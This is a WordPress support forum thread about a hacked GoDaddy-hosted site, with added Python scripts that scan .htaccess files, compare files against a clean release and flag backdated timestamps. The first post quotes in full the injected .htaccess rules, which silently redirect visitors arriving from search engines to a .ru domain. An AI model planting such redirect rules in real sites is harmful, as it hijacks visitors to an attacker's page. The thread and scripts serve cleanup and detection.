WordPress.org


Malicious code in WordPress installations; how to remove? (16 posts)

  1. douglasi
    Member
    Posted 2 years ago #

    Any thoughts on what to do about this? Some Russian site has apparently placed malicious code into my installation of WordPress 3.3.1 on a GoDaddy hosted site. When I look at the WordPress code with the editor (and I am not terribly savvy under the hood of WP) I find massive amounts of gobbledygook before the <div> tags encompassing the WP code in just one of my domains, but then suspicious stuff in the .htaccess files of all 6 of them.

    So, I removed all the gobbledygook in all the various php files of the domain where I found it. But when I come to the 'search.php' page in the WP code editor, in the first place the page looks odd -- with the WP nav bar options and text on the left all highlighted in blue rectangles. And when I try to delete the code here and hit 'Update File,' it throws me out of the dashboard to a 'Problem Loading the Page' error that includes the address of the Russian site:
    http://daliachu-uaroyalys.ru/industry/index.php

    Here is a look at the 'search.php' page and a glimpse of the gobbledygook:
    http://hundredmountain.com/malicious_code_screenshot.jpg

    Then, when I look at every single .htaccess file for every one of a half-dozen WP installations in folders at my hosted site, they all have the following as the entire code in each of the WP file's .htaccess files with the Russian address included. What do I do here?

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ http://daliachu-uaroyalys.ru/industry/index.php [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://daliachu-uaroyalys.ru/industry/index.php [R=301,L]
    </IfModule>
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress
    ........
    How do I deal with this?

    Douglas I
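The .htaccess block quoted above only fires when the HTTP Referer matches a search engine or social site, so the site owner, who types the address directly, never sees the redirect. The following scanner is an added example written for this thread, not code from the poster or from WordPress; it parses .htaccess text, pairs each RewriteRule with the RewriteCond lines in front of it, and reports rules that send visitors to an absolute URL on a foreign host, noting whether the rule is referer-gated. The sample block is constructed (placeholder host, shortened engine list) to mirror the shape of the injected one.

```python
import os
import re

# Constructed sample in the shape of the injected block quoted in the thread:
# a referer-gated redirect followed by the stock WordPress rules. The attacker
# host is a placeholder and the search-engine list is shortened.
SAMPLE_HTACCESS = """<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|facebook|twitter)\\.(.*)
RewriteRule ^(.*)$ http://redirect-target.invalid/industry/index.php [R=301,L]
</IfModule>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

ABSOLUTE_URL = re.compile(r"^https?://([^/\s]+)", re.IGNORECASE)


def find_referer_redirects(text, own_hosts=()):
    """Return every RewriteRule whose target is an absolute URL on a host not in
    own_hosts, together with whether the RewriteCond chain in front of it tests
    HTTP_REFERER. Referer-gated external redirects are the hallmark of this
    hijack: the owner, who types the URL directly, never sees them."""
    findings = []
    conds = []  # RewriteCond lines waiting for their RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond":
            conds.append(line)
            continue
        if directive == "rewriterule" and len(parts) >= 3:
            match = ABSOLUTE_URL.match(parts[2])
            if match and match.group(1).lower() not in own_hosts:
                findings.append({
                    "line": lineno,
                    "host": match.group(1).lower(),
                    "referer_gated": any("%{HTTP_REFERER}" in c.upper() for c in conds),
                    "rule": line,
                })
            conds = []  # conditions apply only to the rule that follows them
    return findings


def scan_tree(root, own_hosts=()):
    """Walk a hosting directory and report findings per .htaccess file."""
    report = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if ".htaccess" in filenames:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_referer_redirects(fh.read(), own_hosts)
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    for hit in find_referer_redirects(SAMPLE_HTACCESS, own_hosts=("example.com",)):
        print(f"line {hit['line']}: redirect to {hit['host']} "
              f"(referer-gated: {hit['referer_gated']}) -> {hit['rule']}")
```

Run `scan_tree("/path/to/hosting/root", own_hosts=("yourdomain.example",))` over the whole account, since the thread shows the same block copied into every installation's .htaccess. Any hit that is referer-gated deserves the same treatment as the one above: remove the foreign block, keep the `# BEGIN WordPress` ... `# END WordPress` section, and then look for the write access that put it there.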

  2. deepbevel
    Member
    Posted 2 years ago #

    how-to-completely-clean-your-hacked-wordpress-installation

    There's just no easy way; I advise doing everything it says.

  3. douglasi
    Member
    Posted 2 years ago #

    Thanks for that link, deepbevel. Alas, I have a half-dozen sites (all subfolders of my main domain) that may be infected. Any opinions or experiences from anyone with paying, let's see, $189.99 to Sucuri.net to clean up 2-5 websites? (GoDaddy, my host, said $190 for 5 sites, too.) Yikes.

    First time this has ever happened to me and just as I was moving toward a possible business launch using some of these sites.

    Douglas

  4. deepbevel
    Member
    Posted 2 years ago #

    It sucks, but sometimes it's not as bad as you think. I had about 12 sites that were hacked. I followed the procedure and I spent about 3 days (maybe 12 hrs total) with the clean up.

    I only bothered to clean malicious code from theme files I had customized; I replaced everything else, except images.

    However I was lucky because only 3 of the sites were published and none had any posts which needed to be saved.

    Good luck, hopefully it won't be so bad :)
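The approach described in the two posts above (replace everything except customised theme files and uploads) is easier to do confidently if you first know exactly which files differ from a clean copy of the same WordPress release. The script below is an added example, not code from the thread or from WordPress: it hashes two directory trees and classifies live files as modified, added or missing relative to the clean download. The `demo()` function builds two small constructed trees in a temp directory so the block runs offline; the file names and contents in it are placeholders.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Hash a file in chunks so large uploads do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def tree_hashes(root):
    """Map each file's slash-separated relative path to its SHA-256."""
    root = Path(root)
    return {
        path.relative_to(root).as_posix(): sha256_of(path)
        for path in root.rglob("*")
        if path.is_file()
    }


def compare_trees(clean_root, live_root):
    """Classify live files against a known-clean copy of the same release."""
    clean = tree_hashes(clean_root)
    live = tree_hashes(live_root)
    return {
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
        "added": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }


def unexpected_php(added):
    """From the 'added' list, keep PHP files other than wp-config.php, which is
    the one PHP file a live site legitimately has and a fresh download lacks."""
    return [p for p in added if p.endswith(".php") and p != "wp-config.php"]


def _write(root, rel, text):
    path = Path(root) / rel
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(text)


def demo():
    """Build two constructed trees: a clean download and a tampered live site."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = Path(tmp) / "clean", Path(tmp) / "live"
        base = {
            "index.php": "<?php require 'wp-blog-header.php';",
            "readme.html": "<html>WordPress</html>",
            "wp-content/themes/demo/search.php": "<?php get_header();",
        }
        for rel, text in base.items():
            _write(clean, rel, text)
            _write(live, rel, text)
        # Simulated tampering: junk prepended to a theme file, a PHP file
        # dropped into uploads, the legitimate site config, readme removed.
        _write(live, "wp-content/themes/demo/search.php",
               "<?php /* constructed junk */ ?>" + base["wp-content/themes/demo/search.php"])
        _write(live, "wp-content/uploads/2012/01/image.php", "<?php /* constructed */")
        _write(live, "wp-config.php", "<?php define('DB_NAME', 'placeholder');")
        (live / "readme.html").unlink()
        result = compare_trees(clean, live)
        result["unexpected_php"] = unexpected_php(result["added"])
        return result


if __name__ == "__main__":
    for key, files in demo().items():
        print(key, files)
```

For a real site, point `compare_trees` at a freshly extracted download of the same version and at the installation; "modified" files under wp-admin and wp-includes are replaced outright, "modified" theme files are the ones deepbevel cleaned by hand, and anything in "unexpected_php" (a .php file under uploads, for instance) needs a close look before the site goes back up. For core files alone, WP-CLI's `wp core verify-checksums` does the same comparison against wordpress.org's published hashes.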

  5. mike3even
    Member
    Posted 2 years ago #

    Hi Douglasi,

    Other than the search.php file, what other WordPress files did you spot the encoded script (gobbledygook) on?

    Thanks!

  6. eyefox
    Member
    Posted 2 years ago #

    Hi

    I'm also getting malware in my GoDaddy Linux hosting account.

    I have deleted all my files in GoDaddy Hosting, but when I check in Google, the malware is still there.

    I don't understand where malware can be contained without files. My hosting is empty now, but the problem is not solved yet.

    I have emailed GoDaddy Support, but they cannot assist me.

    Please help, I lost everything!
    Thanks

  7. douglasi
    Member
    Posted 2 years ago #

    I received more prompt attention by submitting a support ticket through the hosting manager inside GoDaddy and starting the support ticket like this: 'Please escalate this query as this is a time-sensitive issue affecting a business launch ...' plus mentioning that this attack would lead me to drop GoDaddy as a host. The tech support wrote back within 10 hours and said they'd removed the malicious code but I had to do some other things to plug whatever vulnerability led to the attack. I am still wondering whether it has something to do with GoDaddy and WordPress and whether I should remain hosted there.

    In any case, you might try that route instead of going through their phone tech support or home page support.

    Doug

  8. douglasi
    Member
    Posted 2 years ago #

    Dear mike3even: It was everywhere. A whole page of php gobbledygook code was sitting on a bunch of WordPress files in the 6 installations of WordPress I had in subfolders of my GoDaddy site, plus the .htaccess files also had suspicious re-direct code in them. I am checking now to see if GoDaddy tech support really got it all and wondering whether I need to hire a service like sucuri.net to keep this from happening again. I am also not terribly pleased with a remark Bob Parsons once supposedly said at a GoDaddy gathering that "We're the WalMart of hosting...." Not necessarily a good thing, no? But if their tech support did indeed fix the problem, I will be a little happier. Checking now.

  9. mike3even
    Member
    Posted 2 years ago #

    "A whole page of php gobbledygook code was sitting on a bunch of WordPress files "

    Could you be a bit more specific? Do you remember the infected file names or the folders (wp-content, wp-admin, etc.) they were in?

    I am writing a free tool to clean WordPress installs from this malware, thus any additional information would be greatly appreciated.

    Thanks!

  10. Frankthedog
    Member
    Posted 2 years ago #

    The post from deepbevel worked a treat, thanks for that mate!

  11. belimitless
    Member
    Posted 2 years ago #

    Been dealing with this since last Friday. A way I found to overcome it is to roll back to a previous date prior to the attack, change all your passwords & then place every security measure you can. You can only roll back if you are on Linux hosting. This was more cost effective and simpler, at least for me. Hope that helps.

  12. Hydromantic
    Member
    Posted 2 years ago #

    Hi! Same problem here, I post here to get follow up posts in my emails ;)

  13. Charles Kelley
    Member
    Posted 2 years ago #

    Timthumb Vulnerability Scanner. Works like a charm.

  14. eswrite-wp
    Member
    Posted 2 years ago #

    A question: I'm looking for similar malware code in my .php, and though I haven't opened many of the files, I don't see time stamps that are recent. Can I assume those files are untouched, or can a hacker do the swap without affecting time stamps?

  15. MickeyRoush
    Member
    Posted 2 years ago #

    eswrite-wp wrote:

    or can a hacker do the swap without affecting time stamps?

    If they have the right access they can change certain aspects of time stamps. So depending on how you're viewing them, you can't always go by time stamps.
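MickeyRoush's point can be made concrete. The modification time that `ls -l` and FTP clients show is set by whoever last wrote the file and can be set to any value with `touch -d` or `os.utime`; the inode change time (ctime, shown by `stat` or `ls -lc`) is stamped by the kernel on every inode change and cannot be set through the file API. A file whose ctime is far later than its mtime has been written, replaced or re-permissioned after the date its mtime claims. The check below is an added example, not code from the thread; `demo()` constructs a freshly written file with a backdated mtime in a temp directory to show what the heuristic catches.

```python
import os
import tempfile
import time


def ctime_after_mtime(path, tolerance_seconds=60):
    """True when the inode change time is later than the content modification
    time by more than the tolerance. mtime is whatever the last writer chose;
    ctime is stamped by the kernel on every inode change and cannot be set
    through the file API, so a large gap means something touched the file
    after the date its mtime claims."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > tolerance_seconds


def find_backdated(root, suffixes=(".php", ".htaccess"), tolerance_seconds=60):
    """Walk a web root and list files whose mtime looks older than it can be."""
    flagged = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(suffixes):
                path = os.path.join(dirpath, name)
                if ctime_after_mtime(path, tolerance_seconds):
                    flagged.append(path)
    return sorted(flagged)


def demo():
    """Constructed scenario: one freshly written file keeps its real mtime, the
    other is given an mtime one year in the past, which is how a backdated
    file would present in a directory listing."""
    with tempfile.TemporaryDirectory() as tmp:
        honest = os.path.join(tmp, "honest.php")
        backdated = os.path.join(tmp, "backdated.php")
        for path in (honest, backdated):
            with open(path, "w") as fh:
                fh.write("<?php /* constructed */")
        a_year_ago = time.time() - 365 * 86400
        os.utime(backdated, (a_year_ago, a_year_ago))  # sets atime/mtime only
        return {
            "honest": ctime_after_mtime(honest),
            "backdated": ctime_after_mtime(backdated),
            "flagged": [os.path.basename(p) for p in find_backdated(tmp)],
        }


if __name__ == "__main__":
    print(demo())
```

Treat this as a triage aid rather than proof: ctime also moves on chmod, chown and rename, and a site restored from backup or re-uploaded by FTP will show a new ctime on every file, so run it before you start restoring. On a fully compromised server the clock itself can be adjusted, which is why a comparison against a clean copy of the release, as others in this thread advise, remains the dependable test.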

  16. Charles Kelley
    Member
    Posted 2 years ago #

    All, we've found a working fix to this problem. Please see the whole post here and follow my directions, which are more secure than some that others are offering.

    http://wordpress.org/support/topic/i-have-been-well-and-truly-hacked?replies=46#post-2642987

Topic Closed

This topic has been closed to new replies.
